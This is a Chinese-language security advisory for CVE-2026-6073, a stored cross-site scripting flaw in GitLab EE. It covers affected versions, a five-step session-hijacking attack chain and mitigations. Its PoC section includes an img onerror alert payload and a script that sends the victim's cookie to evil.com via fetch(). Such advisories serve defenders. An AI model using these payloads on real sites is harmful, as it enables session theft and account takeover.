CVE-2026-6073 CVSS 8.7 高危

CVE-2026-6073 GitLab EE 跨站脚本漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6073

漏洞类型

跨站脚本 (XSS)

CVSS评分

8.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

GitLab Enterprise Edition (EE)

漏洞概述

CVE-2026-6073 是 GitLab 企业版（EE）中发现的一个高危安全漏洞。该漏洞源于输入清理不当，导致经过身份验证的用户能够在其他用户的浏览器中执行任意 JavaScript 代码。受影响的版本范围较广，包括 18.7 至 18.9.7、18.10 至 18.10.6 以及 18.11 至 18.11.3 之前的所有版本。攻击者利用此漏洞可窃取敏感信息或劫持用户会话。

技术细节

该漏洞属于典型的跨站脚本攻击（XSS），其根本原因在于 GitLab EE 未能对特定用户输入字段进行充分的清理和上下文感知的转义。攻击向量分析显示，攻击者需要具备低权限账户（PR:L），并诱导受害者进行交互（UI:R）。具体利用过程中，攻击者构造包含恶意 JavaScript 代码的 payload，并通过受影响的功能接口提交至服务器。由于缺乏安全过滤，该 payload 被存储在数据库或即时反馈中。当其他用户，尤其是拥有更高权限的用户访问被植入恶意代码的页面时，payload 会在其浏览器上下文中执行。鉴于范围影响为 S:C，攻击者不仅能窃取受害者的 Cookie 和 Session Token，还能利用受害者的身份权限对 GitLab 平台进行未授权操作，甚至进一步横向移动渗透内网环境。

攻击链分析

STEP 1

1. 信息收集与认证

攻击者注册或获取一个 GitLab EE 的低权限账户，确认目标系统运行在受影响版本范围内。

STEP 2

2. Payload 注入

攻击者识别存在过滤缺陷的输入点（如评论、个人简介），并提交包含恶意 JavaScript 代码的 Payload。

STEP 3

3. 诱导访问

攻击者诱导目标用户（特别是管理员）访问包含恶意 Payload 的页面链接，利用社会工程学手段增加点击率。

STEP 4

4. 代码执行

当目标用户浏览器渲染该页面时，由于缺乏转义，恶意脚本在受害者浏览器上下文中执行。

STEP 5

5. 会话劫持

脚本窃取受害者的 Session Cookie 或 Token，并发送至攻击者控制的服务器，从而接管受害者账户。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-6073: Stored XSS in GitLab EE
// Attacker injects payload into a vulnerable field (e.g., issue description, profile bio)

const payload = '<img src=x onerror=alert(document.cookie)>';

// Scenario 1: Simple Alert
// When a victim views the page containing this payload, the alert box pops up.

// Scenario 2: Data Exfiltration
const exfilPayload = '<script>fetch(\'https://evil.com/steal?c=\' + btoa(document.cookie))</script>';

// Note: This requires the attacker to have authenticated access to the application.

影响范围

GitLab EE 18.7 至 18.9.7 之前的所有版本

GitLab EE 18.10 至 18.10.6 之前的所有版本

GitLab EE 18.11 至 18.11.3 之前的所有版本

防御指南

临时缓解措施

在无法立即升级的情况下，建议管理员限制非必要用户的写入权限，并部署 WAF 规则以检测和拦截常见的 XSS 攻击载荷。同时，应加强对异常会话活动的监控。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表